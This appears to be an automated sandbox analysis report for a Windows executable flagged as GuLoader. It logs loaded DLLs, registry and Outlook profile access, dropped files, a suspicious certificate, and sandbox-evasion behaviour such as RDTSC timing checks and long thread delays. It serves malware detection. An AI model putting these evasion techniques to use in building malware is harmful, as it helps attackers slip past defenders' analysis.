Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File written: C:\Users\user\AppData\Local\antinuke\Pennatilobate\subaquatic.ini

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: pkNnK2ya0f.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1521492912.00000000075A4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59A78 push eax; ret	9_2_39A59A79
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A6F910 push es; ret	9_2_39A6F900
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A6F8F0 push es; ret	9_2_39A6F900

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject), 2) Invalid signature that's not trusted by provider, 3) Suspicious organization name 'Genfdendes' appears non-legitimate, 4) Email domain 'Colourationally1.Ki' is highly suspicious and non-standard, 5) Large time gap between compilation date (2017) and certificate creation (2024) suggests possible certificate manipulation, 6) Organization unit 'syndicalism Yengeese' appears randomly generated or meaningless, 7) While country code DE (Germany) is generally trustworthy, other certificate elements strongly suggest this is being used as a false front. The combination of an untrusted self-signed certificate with apparently generated/nonsensical organization details is a strong indicator of malicious intent.

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File created: C:\Users\user\AppData\Local\Temp\nsm6828.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	API/Special instruction interceptor: Address: 7685DF5
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	API/Special instruction interceptor: Address: 4B45DF5

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	RDTSC instruction interceptor: First address: 7624C81 second address: 7624C81 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7B9050B973h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 test bx, D045h 0x0000000e inc ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	RDTSC instruction interceptor: First address: 4AE4C81 second address: 4AE4C81 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7B90736A03h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 test bx, D045h 0x0000000e inc ebx 0x0000000f rdtsc

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Memory allocated: 5ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Memory allocated: 367C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Memory allocated: 36530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598836	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596324	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595914	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595138	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594109	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Window / User API: threadDelayed 7425			Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Window / User API: threadDelayed 2416			Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm6828.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6088	Thread sleep count: 7425 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6088	Thread sleep count: 2416 > 30	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598836s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598727s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595914s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595138s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe TID: 6648	Thread sleep time: -594109s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_004065C5 FindFirstFileW,FindClose,	0_2_004065C5
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405990
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00402862 FindFirstFileW,	9_2_00402862
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_004065C5 FindFirstFileW,FindClose,	9_2_004065C5
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405990

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598836	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596324	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595914	Jump to behavior
